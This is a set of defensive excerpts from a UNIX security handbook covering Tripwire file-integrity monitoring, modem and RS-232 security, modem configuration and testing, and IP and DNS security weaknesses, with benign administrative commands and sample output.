CRC checksums are designed to detect random bit changes, not purposeful alterations. As such, CRC checksums are good<br />

at finding a few bits changed at random. However, because they are generated with well-known polynomials, one can alter the input file so as to produce an arbitrary CRC value after an edit. In fact, some of the same hacker toolkits that

allow files to be changed without altering the time also contain code to set the file contents to generate the same sum<br />

outputs for the altered file as for the original.<br />


To generate a checksum that cannot be easily spoofed, we need to use a stronger mechanism, such as the message digests<br />

described in "Message Digests and Digital Signatures" in Chapter 6, Cryptography. These are also dependent on the<br />

contents of the file, but they are too difficult to spoof after changes have been made.<br />

If we had a program to generate the MD5 checksum of a file, we might alter our checklist script to be:<br />

#!/bin/sh<br />

find `cat /usr/adm/filelist` -ls -type f -exec md5 {} \; > /tmp/now

diff -b /usr/adm/savelist /tmp/now<br />

9.2.4 Tripwire<br />

Above, we described a method of generating a list of file attributes and message digests. The problem with this approach is<br />

that we don't really want that information for every file. For instance, we want to know if the owner or protection modes of<br />

/etc/passwd change, but we don't care about the size or checksum because we expect the contents to change. At the same<br />

time, we are very concerned if the contents of /bin/login are altered.<br />

We would also like to be able to use different message digest algorithms. In some cases, we are concerned enough that we<br />

want to use three strong algorithms, even if they take a long time to make the comparison; after all, one of the algorithms<br />

might be broken soon.[4] In other environments, a fast but less secure algorithm, used in conjunction with other methods,<br />

might be all that is necessary.<br />

[4] This is not so farfetched. As this book went to press, reports circulated of a weakness in the MD4 message<br />

digest algorithm.<br />

In an attempt to meet these needs[5] the Tripwire package was written at Purdue by Gene Kim and Gene Spafford.<br />

Tripwire is a program that runs on every major version of <strong>UNIX</strong> (and several obscure versions). It reads a configuration<br />

file of files and directories to monitor, and then tracks changes to inode information and contents. The database is highly<br />

configurable, and allows the administrator to specify particular attributes to monitor, and particular message digest<br />

algorithms to use for each file.<br />

[5] And more: see the papers that come with the distribution.<br />

9.2.4.1 Building Tripwire<br />

To build the Tripwire package, you must first download a copy from the canonical distribution site, located at<br />

ftp://coast.cs.purdue.edu/pub/COAST/Tripwire.[6] The distribution has been signed with a detached PGP digital signature<br />

to verify that the version you download has not been altered in an unauthorized manner (See the discussion of digital<br />

signatures in "PGP detached signatures" in Chapter 6.)<br />

[6] As this book goes to press, several companies are discussing a commercial version of Tripwire. If one is<br />

available, a note will be on the FTP site noting its source. Be aware that Purdue University holds the<br />

copyright on Tripwire and only allows its use for limited, noncommercial use without additional license.<br />

Next, read all the README files in the distribution. Be certain you understand the topics discussed. Pay special attention<br />

to the details of customization for local considerations, including the adaption for the local operating system. These<br />

changes normally need to be made in the include/config.h file. You also need to set the CONFIG_PATH and<br />

DATABASE_PATH defines to the secured directory where you will store the data.<br />

One additional change that might be made is to the default flags field, defined in the DEFAULTIGNORE field. This item<br />

specifies the fields that Tripwire, by default, will monitor or ignore for files without an explicit set of flags. As shipped,<br />

this is set to the value "R-3456789" - the flags for read-only files, and only message digests 1 and 2. These are the MD5<br />

and Snefru signatures. You may want to change this to include other signatures, or replace one of these signatures with a<br />

different one; the MD5, SHA, and Haval algorithms appear to be the strongest algorithms to use.<br />

Next, you will want to do a make followed by a make test. The test exercises all of the Tripwire functions, and ensures that<br />


it was built properly for your machine. This will also demonstrate how the output from Tripwire appears.<br />

The next step is to build the configuration file. Tripwire scans files according to a configuration file. The file contains the<br />

names of files and directories to scan, and flags to specify what to note for changes. For example, you might have the<br />

following in your configuration file:<br />

/.rhosts R # may not exist<br />

/.profile R # may not exist<br />

/.forward R-12+78 # may not exist<br />

/usr/spool/at L<br />

=/tmp L-n<br />

In this example, the /.rhosts, /.profile, and /.forward files have everything in the inode checked for changes except the

access time. Thus, the owner, group, size, protection modes, modification time, link count, and ctime are all monitored for<br />

change. Further, the first two files are also checksummed using the MD5 and Snefru signatures, and the /.forward file is<br />

checksummed with the SHA and HAVAL algorithms. The directory /usr/spool/at and everything inside it is checked for<br />

changes to owner, group, protection modes, and link count; changes to contents are allowed and ignored. The /tmp<br />

directory is checked for the same changes, but its contents are not checked.<br />

Other flags and combinations are also possible. Likely skeleton configuration files are provided for several major<br />

platforms.<br />

Finally, you will want to move the binary for Tripwire and the configuration file to the protected directory that is located<br />

on (normally) read-only storage. You will then need to initialize the database; be sure that you are doing this on a known<br />

clean system - reinstall the software, if necessary. After you have generated the database, set the protections on the<br />

database and binary.<br />
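
As a rough sketch, the sequence with the academic (version 1.x) distribution looks something like this; the database location matches the warning message shown below, and the exact option names should be checked against the man page for your release:

tripwire -initialize     # build the database on a known clean system
# ...move the database and the configuration file to protected,
#    preferably read-only, storage...
tripwire                 # subsequent runs compare the system against the database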

When you build the database, you will see output similar to this:<br />

### Phase 1: Reading configuration file<br />

### Phase 2: Generating file list<br />

### Phase 3: Creating file information database<br />

###<br />

### Warning: Database file placed in ./databases/tw.db_mordor.cs.purdue.edu.<br />

###<br />

### Make sure to move this file and the configuration

### to secure media!<br />

###<br />

### (Tripwire expects to find it in `/floppy/system.db'.)<br />

NOTE: When possible, build Tripwire statically to prevent its using shared libraries which might have Trojan<br />

horses in them. This type of attack is one of the few remaining vulnerabilities in the use of Tripwire.<br />

9.2.4.2 Running Tripwire<br />

You run Tripwire from the protected version on a periodic basis to check for changes. You should run it manually<br />

sometimes rather than only from cron. This step ensures that Tripwire is actually run and you will see the output. When<br />

you run it and everything checks out as it should, you will see output something like this:<br />

### Phase 1: Reading configuration file<br />

### Phase 2: Generating file list<br />

### Phase 3: Creating file information database<br />

### Phase 4: Searching for inconsistencies<br />

###<br />

### Total files scanned: 2640<br />

### Files added: 0<br />

### Files deleted: 0<br />


### Files changed: 2586<br />

###<br />

### After applying rules:<br />

### Changes discarded: 2586<br />

### Changes remaining: 0<br />

###<br />

This output indicates no changes. If files or directories had changed, you would instead see output similar to:<br />

### Phase 1: Reading configuration file<br />

### Phase 2: Generating file list<br />

### Phase 3: Creating file information database<br />

### Phase 4: Searching for inconsistencies<br />

###<br />

### Total files scanned: 2641<br />

### Files added: 1<br />

### Files deleted: 0<br />

### Files changed: 2588<br />

###<br />

### After applying rules:<br />

### Changes discarded: 2587<br />

### Changes remaining: 3<br />

###<br />

added: -rw------- root 27 Nov 8 00:33:40 1995 /.login<br />

changed: -rw-r--r-- root 1594 Nov 8 00:36:00 1995 /etc/mnttab<br />

changed: drwxrwxrwt root 1024 Nov 8 00:42:37 1995 /tmp<br />

### Phase 5: Generating observed/expected pairs for changed files<br />

###<br />

### Attr Observed (what it is) Expected (what it should be)<br />

### =========== ================================================<br />

/etc/mnttab<br />

st_mtime: Wed Nov 8 00:36:00 1995 Tue Nov 7 18:44:47 1995<br />

st_ctime: Wed Nov 8 00:36:00 1995 Tue Nov 7 18:44:47 1995<br />

md5 (sig1): 2tIRAXU5G9WVjUKuRGTkdi 0TbwgJStEO1boHRbXkBwcD<br />

snefru (sig2): 1AvEJqYMlsOMUAE4J6byKJ 3A2PMKEy3.z8KIbwgwBkRs<br />

/tmp<br />

st_nlink: 5 4<br />

This output shows that a file has been added to a monitored directory (Tripwire also detects when files are deleted), and<br />

that both a directory and a file had changes. In each case, the nature of the changes is reported to the user. This report can

then be used to determine what to do next.<br />

Tripwire has many options, and can be used for several things other than simple change detection. The papers and man<br />

pages provided in the distribution are quite detailed and should be consulted for further information.



Chapter 14: Telephone Security

14.6 Additional Security for Modems

With today's telephone systems, if you connect your computer's modem to an outside telephone line, then<br />

anybody in the world can call it. In the future, the telephone system might be able to easily prevent<br />

people from calling your computer's modem unless you have specifically preauthorized them. Until then,<br />

we will have to rely on other mechanisms to protect our modems and computers from intruders.<br />

Although usernames and passwords provide a degree of security, they are not foolproof. Users often pick<br />

bad passwords, and even good passwords can occasionally be guessed or discovered by other means.<br />

For this reason, a variety of special kinds of modems have been developed that further protect computers<br />

from unauthorized access. These modems are more expensive than traditional modems, but they do<br />

provide an added degree of security and trust.<br />

● Password modems. These modems require the caller to enter a password before the modem connects the caller to the computer. As with regular UNIX passwords, the security provided by these modems can be defeated by repeated password guessing or by having an authorized person release his password to somebody who is not authorized. Usually, these modems can only store one to ten passwords. The password stored in the modem should not be the same as the password of any user. Some versions of UNIX can be set up to require special passwords for access by modem. Password modems are probably unnecessary on systems of this kind; the addition of yet another password may be more than your users are prepared to tolerate.

● Callback setups. As we mentioned earlier in this chapter, these schemes require the caller to enter a username, and then immediately hang up the telephone line. The modem then will call the caller back on a predetermined telephone number. These schemes offer a higher degree of security than regular modems, although they can be defeated by somebody who calls the callback modem at the precise moment that it is trying to make its outgoing telephone call. Most callback modems can only store a few numbers to call back. These modems can also be defeated on some kinds of PBX systems by not hanging up the telephone line when the computer attempts to dial back.

● Encrypting modems. These modems, which must be used in pairs, encrypt all information transmitted and received over the telephone lines. These modems offer an extremely high degree of security not only against individuals attempting to gain unauthorized access, but also against wiretapping. Some encrypting modems contain preassigned cryptographic "keys" that work only in pairs. Other modems contain keys that can be changed on a routine basis, to further enhance security. (Chapter 6, Cryptography, contains a complete discussion of encryption.)


● Caller-ID and ANI schemes. These use a relatively new feature available on many digital telephone switches. As described earlier in this chapter, you can use the information provided by the telephone company for logging or controlling access. Already, some commercial firms provide a form of call screening using ANI (Automatic Number Identification) for their 800 numbers (which have had ANI available since the late 1980s). When the user calls the 800 number, the ANI information is checked against a list of authorized phone numbers, and the call is switched to the company's computer only if the number is approved.



Chapter 14: Telephone Security

14.3 The RS-232 Serial Protocol

One of the most common serial interfaces is based on the RS-232 standard, which was developed<br />

primarily to allow individuals to use terminals with remote computer systems over a telephone line more<br />

easily.<br />

The basic configuration of a terminal and a computer connected by two modems is shown in Figure 14.2.

Figure 14.2: A terminal and a computer connected by two modems<br />

The computer and terminal are called data terminal equipment (DTE), while the modems are called data<br />

communication equipment (DCE). The standard RS-232 connector is a 25-pin D-shell type connector;<br />

only nine pins are used to connect the DTE and DCE sides together, as seen in Figure 14.3.<br />

Figure 14.3: The standard 25-pin RS-232 connector<br />


Of these nine pins, only transmit data (pin 2), receive data (pin 3), and signal ground (pin 7) are essential<br />

for directly wired communications. Five pins (2, 3, 7, 8, and 20) are needed for proper operation of<br />

modems. Frame ground (pin 1) was originally used to connect electrically the physical frame of the DCE<br />

and the frame of the DTE to reduce electrical hazards, although its use has been discontinued in the<br />

RS-232-C standard. Table 14.1 describes the use of each pin.<br />

Table 14.1: RS-232 Pin Assignments for a 25-Pin Connector

Pin 1 - FG (Frame Ground): Chassis ground of equipment. (Note: this pin is historical; modern systems don't connect the electrical ground of different components together, because such a connection causes more problems than it solves.)

Pin 2 - TD (Transmit Data): Data transmitted from the computer or terminal to the modem.

Pin 3 - RD (Receive Data): Data transmitted from the modem to the computer.

Pin 4 - RTS (Request to Send): Tells the modem when it can transmit data. Sometimes the computer is busy and needs to have the modem wait before the next character is transmitted. Used for "hardware flow control."

Pin 5 - CTS (Clear to Send): Tells the computer when it's okay to transmit data. Sometimes the modem is busy and needs to have the computer wait before the next character is transmitted. Used for "hardware flow control."

Pin 6 - DSR (Data Set Ready): Tells the computer that the modem is turned on. The computer should not send the modem commands if this signal is not present.

Pin 7 - SG (Signal Ground): Reference point for all signal voltages.

Pin 8 - DCD (Data Carrier Detect): Tells the computer that the modem is connected by telephone with another modem. UNIX may use this signal to tell it when to display a login: banner.

Pin 20 - DTR (Data Terminal Ready): Tells the modem that the computer is turned on and ready to accept connections. The modem should not answer the telephone - and it should automatically hang up on an established conversation - if this signal is not present.

Pin 22 - RI (Ring Indicator): Tells the computer that the telephone is ringing.

Because only nine pins of the 25-pin RS-232 connector are used, the computer industry has largely moved to smaller connectors that have fewer pins and cost less money to produce. Most PCs are equipped with a 9-pin RS-232 connector, which has the pin assignments listed in Table 14.2.

Table 14.2: RS-232 Pin Assignments for 25- and 9-pin Connectors

Code  Name                 25-pin Connector  9-pin Connector
TD    Transmit Data        2                 3
RD    Receive Data         3                 2
RTS   Request to Send      4                 7
CTS   Clear to Send        5                 8
DSR   Data Set Ready       6                 6
SG    Signal Ground        7                 5
DCD   Data Carrier Detect  8                 1
DTR   Data Terminal Ready  20                4
RI    Ring Indicator       22                9

A number of nonstandard RS-232 connectors are also in use. The Apple Macintosh computer uses a<br />

circular 9-pin DIN connector, and there are several popular (and incompatible) systems for using<br />

standard modular telephone cords.<br />

In general, you should be suspicious of any RS-232 system that claims to carry all eight signals between<br />

the data set and the data terminal without the full complement of wires.<br />


14.3.1 Originate and Answer

Modern modems can both place and receive telephone calls. After a connection between two modems is established, information that each modem receives on the TD pin is translated into a series of tones that are sent down the telephone line. Likewise, each modem takes the tones that it receives through its telephone connection, passes them through a series of filters and detectors, and eventually translates them back into data that is transmitted on the RD pin.

To allow modems to transmit and receive information at the same time, different tones are used for each direction of data transfer. By convention, the modem that places the telephone call runs in originate mode and uses one set of tones, while the modem that receives the telephone call operates in answer mode and uses another set of tones.

High-speed modems have additional electronics inside them that perform data compression before the data is translated into tones. Some high-speed modems automatically reallocate their audio spectrum as the call progresses to maximize signal clarity and thus maximize data transfer speed. Others allocate a high-speed channel to the answering modem and a low-speed channel to the originating modem, with provisions for swapping channels should the need arise.

Further details on modem operation are available from any reasonably current book on data communications. Some are listed in Appendix D, Paper Sources.


Chapter 14
Telephone Security

14.5 Modems and UNIX

UNIX can use modems both for placing calls (dialing out) and for receiving them (letting other people dial in).

If you are calling out, you can call computers running any operating system. Outgoing calls are usually made with the tip or cu commands. If you call a computer that's running the UNIX operating system, you may be able to use a simple file-transfer system built into tip and cu. Unfortunately, such a system performs no error checking or correction and works only for transferring text files.

Another popular program for dialing out is kermit, from Columbia University. Besides performing terminal emulation, kermit also allows reliable file transfer between different kinds of computers. Versions of kermit are available for practically every kind of computer in existence.

You can also set up your computer's modem to let people with their own modems call into your computer. There are many reasons why you might wish to do this:

● If you have many people within your organization who want to use your computer, but they need to use it only infrequently, the most cost-effective approach might be to have each employee call your computer, rather than wiring terminal lines to every person's office.

● If some people in your organization travel a lot, they might want to use a modem to access the computer when they're out of town.

● If people in your organization want to use the computer from their homes after hours or on weekends, a modem will allow them to do so.

● You can have administrators do some remote maintenance and administration when they are "on call."

UNIX also uses modems with the UUCP (UNIX-to-UNIX Copy) network system, which allows different computers to exchange electronic mail; we discuss UUCP in detail in Chapter 15, UUCP. You can also use modems with SLIP (Serial Line Internet Protocol) or PPP (Point-to-Point Protocol) to integrate remote computers transparently with local area networks. To set up a UUCP, SLIP, or PPP link between two computers, one computer must be able to place telephone calls and the other must be able to receive them.

Despite these benefits, modems come with many risks. Because people routinely use modems to transmit their usernames and passwords, you should ensure that your modems are properly installed, behaving properly, and doing exactly what you think they are doing - and nothing else.

14.5.1 Hooking Up a Modem to Your Computer

Because every computer and every modem is a little different, follow your manufacturer's directions when connecting a modem to your computer. Usually, there is a simple, ready-made cable that can be used to connect the two. If you are lucky, that cable may even come in the same box as your modem.

After the modem is physically connected, you will need to set up a number of configuration files on your computer so that your system knows where the modem is connected and what kind of commands it responds to.

On Berkeley-derived systems, you may have to modify the files /etc/ttys, /etc/remote, and /usr/lib/uucp/L-devices if you wish to use UUCP. On System V systems, you may have to modify the files /etc/inittab and /usr/lib/uucp/Devices. You may also have to create a special device file in the /dev directory, or change the permissions on an existing file. The formats of these files are discussed in Chapter 15, UUCP.

Depending on the software you are using, you should also check the permissions on any configuration files used with your modem software. These may include files of commands, phone numbers, PPP or SLIP initialization values, and so on. As the number and location of these files vary considerably from system to system, we can only suggest that you read the documentation carefully for the names of any auxiliary files that may be involved. Pay special attention to any man pages associated with the software, as they often include a section entitled "Files" that names associated files.

14.5.2 Setting Up the UNIX Device

Each version of UNIX has one or more special devices in the /dev directory that are dedicated to modem control. Some of the names that we have seen are:

/dev/cua*
/dev/ttyda
/dev/ttys[0-9]
/dev/tty1A
/dev/modem
/dev/ttydfa

Some versions of UNIX use the same devices for inbound and outbound calls; others use different names for each purpose, even though the names represent the same physical device. Check your documentation to see what the filenames are for your system.

Permissions for the UNIX devices associated with modems should be set to mode 600 and owned by either root or uucp. If a modem device is made readable by group or world, it might be possible for users to intercept incoming phone calls and eavesdrop on ongoing conversations, or to create Trojan horse programs that invite unsuspecting callers to type their usernames and passwords.

Permissions for the UNIX devices associated with outgoing modems should likewise be set so that the modems cannot be accessed by ordinary users: the devices are usually set to mode 600 and owned by either root or uucp. To make an outgoing call, users must then use a specially designated communications program such as tip or cu. These programs must be installed SUID so that they can access the external device.

You can check the ownership and modes of these devices with the ls command:

% ls -lgd /dev/cu*
crw------- 1 uucp wheel 11,192 Oct 20 10:38 /dev/cua
crw------- 1 uucp wheel 11,193 Dec 21 1989 /dev/cub
%
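If the ownership or modes are wrong, you can correct them by hand as the superuser. This is a minimal sketch; the device names are only examples, and your system's modem devices may be named differently:

# chown uucp /dev/cua /dev/cub
# chmod 600 /dev/cua /dev/cub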

14.5.3 Checking Your Modem

After your modem is connected, you should thoroughly test its ability to make and receive telephone calls. First, make sure that the modem behaves properly under normal operating circumstances. Next, make sure that when something unexpected happens, the computer behaves in a reasonable and responsible way. For example, if a telephone connection is lost, your computer should kill the associated processes and log the user out, rather than letting the next person who dials in type commands at the previous shell. Most of this testing will ensure that your modem's control signals are being properly sent to the computer (so that your computer knows when a call is in progress), as well as ensuring that your computer behaves properly with this information.

14.5.3.1 Originate testing

If you have configured your modem to place telephone calls, you need to verify that it always does the right thing when calls are placed as well as when they are disconnected.

To test your modem, you must call another computer that you know behaves properly. (Do not place a call to the same computer that you are trying to call out from; if there are problems, you may not be able to tell where the problem lies.)

Test as follows:

1. Try calling the remote computer with the tip or cu command. When the computer answers, you should be able to log in and use the remote computer as if you were connected directly.

2. Hang up on the remote computer by pulling the telephone line out of the originating modem. Your tip or cu program should realize that the connection has been lost and return you to the UNIX prompt.

3. Call the remote computer again and this time hang up by turning off your modem. Again, your tip or cu program should realize that something is wrong and return you to the UNIX prompt.

4. Call the remote computer again. This time, leave the telephone connection intact and exit your tip or cu program by typing the following sequence: carriage return, tilde (~), period (.), carriage return. Your modem should automatically hang up on the remote computer.

5. Call the remote computer one last time. This time, do a software disconnect by killing the tip or cu process on your local computer from another terminal. (You may need to be the superuser to use the kill command to kill the other process. See Appendix C, UNIX Processes, for details about how to use these commands.) Once again, your modem should automatically hang up on the remote computer.

The above sequence of steps checks out the modem control signals between your computer and your modem. If things do not work properly, then one of the following may be a problem:

● The cable connecting your modem and computer may be shorting together several pins, may have a broken wire, or may be connecting the wrong pins on each connector together.

● Your modem may not be properly configured. Many modems have switches or internal registers that can make the modem ignore some or all of the modem control signals.

● You may be using the wrong UNIX device. Many versions of UNIX have several different devices in the /dev directory for referring to each physical serial port. Usually one of these devices uses the modem control signals, while others do not. Check your documentation and make sure you're using the proper device.

● Your software vendor might not have figured out how to make a tty driver that works properly. Many older versions of DEC's Ultrix had problems with their tty drivers, for example.

Other things to check for dialing out include:

● Make sure there is no way to enter your modem's programming mode by sending an "escape sequence." An escape sequence is a sequence of characters that lets you reassert control over the modem and reprogram it. Most UNIX modem control programs will disable the modem's escape sequence, but some do not.[5] (A short test transcript appears after this list.)

[5] Most modems that use the Hayes "AT" command set, for example, can be forced into programming mode by allowing a three-second pause; sending three plus signs (+), the default escape character, in quick succession; and waiting another three seconds. If your modem prints "OK," then your modem's escape sequence is still active.

If your modem's escape sequence is not disabled, consult your modem documentation or contact your modem vendor to determine how to disable the sequence. This step may require you to add some additional initialization sequence to the modem software, or set some configuration switches.

● Verify that your modems lock properly. Be sure that there is no way for one user to make tip or cu use a modem that is currently in use by another user or by the UUCP system. Likewise, make sure that UUCP does not use a telephone line that is being used interactively.
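Here is roughly what the escape-sequence test described in the footnote might look like from a cu session. The device name is only an example, and the exact responses depend on your modem; on many Hayes-compatible modems the escape character can be disabled entirely by setting register S2 to a value greater than 127 in the initialization string, but check your modem's manual before relying on that.

% cu -l /dev/cua
Connected
(pause three seconds, type +++ quickly, pause three more seconds)
OK
~.
Disconnected
%

If "OK" appears, the escape sequence is still active and should be disabled.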

Finally, verify that every modem connected to your computer works as indicated above. Both cu and tip allow you to specify which modem to use with the -l option. Try them all.

If the cu or tip program does not exit when the telephone is disconnected, or if it is possible to return the modem to programming mode by sending an escape sequence, a user may be able to make telephone calls that are not logged. A user might even be able to reprogram the modem, causing it to call a specific phone number automatically, no matter what phone number it was instructed to call. At the other end, a Trojan horse might be waiting for your users.


If the modem does not hang up the phone when cu exits, it can result in abnormally high telephone bills. Perhaps more importantly, if a modem does not hang up the telephone when the tip or cu program exits, then your user might remain logged into the remote machine. The next person who uses the tip or cu program would then have full access to that first user's account on the remote computer.

14.5.3.2 Answer testing

To test your computer's answering ability, you need another computer or terminal with a second modem to call your computer.

Test as follows:

1. Call your computer. It should answer the phone on the first few rings and print a login: banner. If your modem is set to cycle among various baud rates, you may need to press the BREAK or linefeed key on your terminal a few times to synchronize the answering modem's baud rate with the one that you are using. You should not press BREAK if you are using a MNP modem that automatically selects baud rate.

2. Log in as usual. Type tty to determine for sure which serial line you are using. Then log out. Your computer should hang up the phone. (Some versions of System V UNIX will instead print a second login: banner. Pressing CTRL-D at this banner may hang up the telephone.)

3. Call your computer and log in a second time. This time, hang up the telephone by pulling the telephone line out of the originating modem. This action simulates having the phone connection accidentally broken. Call your computer back on the same telephone number. You should get a new login: banner. You should not be reconnected to your old shell; that shell should have had its process destroyed when the connection was broken. Type tty again to make sure that you got the same modem. Use the ps command to ensure that your old process was killed. UNIX must automatically log you out when the telephone connection is broken. Otherwise, if the telephone is accidentally hung up and somebody else calls your computer, that person will be able to type commands as if he was a legitimate user, without ever having to log in or enter a password.

4. Verify that every modem connected to your computer behaves in this manner. Call the modem with a terminal, log in, then unplug the telephone line going into the originating modem to hang up the phone. Immediately redial the UNIX computer's modem and verify that you get a new login: prompt.

NOTE: Even though UNIX should automatically log you out when you hang up the telephone, do not depend on this feature. Always log out of a remote system before disconnecting from it.

5. If you have several modems connected to a hunt group (a pool of modems where the first non-busy one answers, and all calls are made to a single number), make sure that the group hunts properly. Many don't - which results in callers getting busy signals even when there are modems available.

14.5.3.3 Privilege testing

Programs such as cu and tip usually must run SUID so that they can manipulate the devices associated with the modems. However, these programs are specially designed so that if the user attempts a shell escape, the command runs with the user's UID and not the program's. (Likewise, if the user tries to redirect data to or from a file, cu and tip are careful not to give the user access to a file to which the user would not otherwise have access.) You should check your versions of cu and tip to make sure that users are not granted any special privileges when they run these programs.

One way to verify that your program is properly configured is to use cu or tip to connect to a remote machine and then use a shell escape that creates a file in the /tmp directory. Then, look at the file to see who owns it. For example:

% tip 5557000
connected
login:
~!
[sh]
% touch /tmp/myfile
% ls -l /tmp/myfile
-rw-r--r-- 1 jason 0 Jul 12 12:19 /tmp/myfile
%

The file should be owned by the user who runs the cu or tip program, and not by root or uucp.

Some communications programs, such as kermit, must be installed SUID uucp, and not root. For example, if you try to run kermit while it is SUID root, you will get the following message:

unix% kermit
Fatal: C-Kermit setuid to root!
unix%

The reason for this behavior is that SUID root programs can be dangerous things, and the authors of kermit wisely decided that the program was too complex to be entrusted with such privilege. Instead, kermit should be installed SUID uucp, with the outbound modems configured accordingly. In this manner, kermit has access to the modems and nothing else.

If you have a third-party communications program that you cannot install SUID uucp, you may wish to use SGID instead. Simply create a uucp group, set the group of the modem UNIX devices to uucp, give the group both read and write access to the modems, and make the third-party program SGID uucp. And if these measures don't work, complain to your software vendor!
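A minimal sketch of the SGID approach follows. The program name and device names are placeholders; groupadd is the SVR4 command, and on other systems you would instead add the group by editing /etc/group directly:

# groupadd uucp
# chgrp uucp /dev/cua /dev/cub
# chmod 660 /dev/cua /dev/cub
# chgrp uucp /usr/local/bin/commprog
# chmod g+s /usr/local/bin/commprog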

14.5.4 Physical Protection of Modems

Although physical protection is often overlooked, protecting the physical access to your telephone line is as important as securing the computer to which the telephone line and its modem are connected.

Be sure to follow these guidelines:

● Protect physical access to your telephone line. Be sure that your telephone line is physically secure. Lock all junction boxes. Place the telephone line itself in an electrical conduit, pulled through walls, or at least located in locked areas. An intruder who gains physical access to your telephone line can attach his or her own modem to the line and intercept your telephone calls before they reach your computer. By spoofing your users, the intruder may learn their login names and passwords. Instead of intercepting your telephone calls, an intruder might simply monitor them, making a transcript of all of the information sent in either direction. In this way, the intruder might learn passwords not only to your system, but to all of the systems to which your users connect.

● Make sure your telephone line does not allow call forwarding. If your telephone can be programmed for call forwarding, an intruder can effectively transfer all incoming telephone calls to a number of his choosing. If there is a computer at the new number that has been programmed to act like your system, your users might be fooled into typing their usernames and passwords.

● Consider using a leased line. If all your modem usage is to a single outside location, consider getting a leased line. A leased line is a dedicated circuit between two points provided by the phone company. It acts like a dedicated cable, and cannot be used to place or receive calls. As such, it allows you to keep your connection with the remote site, but it does not allow someone to dial up your modem and attempt a break-in. Leased lines are more expensive than regular lines in most places, but the security may outweigh the cost. Leased lines offer another advantage: you can usually transfer data much faster over leased lines than over standard telephone lines.

● Don't get long distance service. If you don't intend to use the telephone for long-distance calls, do not order long distance service for the telephone lines.

● Have your telephone company disable third-party billing. Without third-party billing, people can't bill their calls to your modem line.


Chapter 16
TCP/IP Networks

16.3 IP Security

Throughout the 1980s, computers on the Internet were subject to many individual attacks. The solution to these attacks was relatively simple: encourage users to choose good passwords, prevent users from sharing accounts with each other, and eliminate security holes in programs such as sendmail and login as holes were discovered.

In the 1990s, the actual infrastructure of the Internet has come under attack:

● Network sniffers have captured passwords and other sensitive pieces of information passing through the network as they are transmitted.

● IP spoofing attacks have been used by attackers to break into hosts on the Internet.

● Connection hijacking has been used by attackers to seize control of existing interactive sessions (e.g., telnet).

● Data spoofing has been used by attackers with a rogue computer on a network to insert data into an ongoing communication between two other hosts. Data spoofing has been demonstrated as an effective means of compromising the integrity of programs executed over the network from NFS servers.

Many of these attacks were anticipated more than ten years ago. Yet the IP protocols and the Internet itself are not well protected against them. There are several reasons for this apparent failure:

● IP was designed for use in a hostile environment, but its designers did not thoroughly appreciate how hostile the network itself might one day become.

IP was designed to allow computers to continue communicating after some communications lines had been cut. This concept is the genesis of packet communications: by using packets, you can route communications around points of failure. But the IP designers appear not to have anticipated wide-scale covert attacks from legitimate users. As a result, while IP is quite resilient when subjected to hardware failure, it is less resistant to purposeful attack.

● IP was not designed to provide security.

IP was designed to transmit packets from one computer to another. It was not designed to provide a system for authenticating hosts, or for allowing users to send communications on the network in absolute secrecy. For these purposes, IP's creators assumed that other techniques would be used.

● IP is an evolving protocol.

IP is always improving. Future versions of IP may provide greater degrees of network security. However, IP is still, in many senses, an experimental protocol. It is being employed for uses for which it was never designed.

16.3.1 Link-level Security

IP is designed to get packets from one computer to another computer; the protocol makes no promise as to whether or not other computers on the same network will be able to intercept and read those packets in real time. Such interception is called eavesdropping or packet sniffing.

Different ways of transmitting packets have different susceptibility to eavesdropping. The following table lists several different ways of sending packets and notes the eavesdropping potential.

Table 16.4: Eavesdropping Potential for Different Data Links

Data link (Potential for Eavesdropping): Comments

Ethernet (High): Ethernet is a broadcast network. Most incidents of packet sniffing that have plagued the Internet have been the result of packet-sniffing programs running on a computer that shares an Ethernet with a gateway or router.

FDDI, Token Ring (High): Although ring networks are not inherently broadcast, in practice all packets that are transmitted on the ring pass through, on average, one-half of the interfaces that are on the network. High data rates make sniffing somewhat challenging.

Telephone lines (Medium): Telephones can be wiretapped by someone who has the cooperation of the telephone company or who has physical access to telephone lines. Calls that traverse microwave links can also be intercepted. In practice, high-speed modems are more difficult to wiretap than low-speed modems because of the many frequencies involved.

IP over cable TV (High): Most systems that have been developed for sending IP over cable TV rely on RF modems which use one TV channel as an uplink and another TV channel for a downlink. Both packet streams are unencrypted and can be intercepted by anyone who has physical access to the TV cable.

Microwave and radio (High): Radio is inherently a broadcast medium. Anyone with a radio receiver can intercept your transmissions.

The only way to protect against eavesdropping in these networks is by using encryption. There are several methods:

Link-level encryption
With link-level encryption, packets are automatically encrypted when they are transmitted over an unsecure data link and decrypted when they are received. Eavesdropping is defeated because an eavesdropper does not know how to decrypt packets that are intercepted. Link-level encryption is available on many radio networking products, but is harder to find for other broadcast network technologies such as Ethernet or FDDI. Special link encryptors are available for modems and leased-line links.

End-to-end encryption
With end-to-end encryption, the host transmitting the packet encrypts the packet's data; the packet's contents are automatically decrypted when they are received at the other end. Some organizations that have more than one physical location use encrypting routers for connecting to the Internet. These routers automatically encrypt packets that are being sent from one corporate location to the other, to prevent eavesdropping by attackers on the Internet; however, the routers do not encrypt packets that are being sent from the organization to third-party sites on the network.

Application-level encryption
Instead of relying on hardware to encrypt data, encryption can be done at the application layer. For example, the Kerberos version of the telnet command can automatically encrypt the contents of the telnet data stream in both directions.
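For example, the telnet client distributed with MIT's Kerberos (an assumption about which Kerberized telnet you have installed) accepts a -x option that requests an encrypted, authenticated session; the hostname below is only an example:

% telnet -x server.example.com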

These three encryption techniques are shown in Figure 16.8.

Figure 16.8: Three types of encryption for communication


16.3.2 Security and Nameservice

DNS was not designed to be a secure protocol. The protocol contains no means by which the information returned by a DNS query can be verified as correct or incorrect. Thus, if DNS tells you that a particular host has a particular IP address, there is no way that you can be certain whether the information returned is correct.

DNS was designed as an unsecure protocol because IP addresses and hostnames were designed as a system for moving data, and not as a system for providing authentication.

Unfortunately, hostnames and IP addresses are commonly used for authentication on the Internet. The Berkeley UNIX r commands (rsh and rlogin) use the hostname for authentication. Many programs examine the IP address of an incoming TCP connection, perform a reverse lookup DNS operation, and trust that the resulting hostname is correct. More sophisticated programs perform a double reverse lookup, in which the network client performs an IP address lookup with the resulting hostname, to see if the looked-up IP address matches the IP address of the incoming TCP connection.[12]

[12] A double reverse lookup involves looking up the hostname that corresponds to an incoming IP connection, then doing a lookup on that hostname to verify that it has the same IP address. This process is non-trivial, as Internet computers can have more than one IP address, and IP addresses can resolve to more than one Internet hostname. Although the double reverse lookup is designed to detect primitive nameserver attacks, all that it usually detects is sites that have not properly configured their nameserver files.
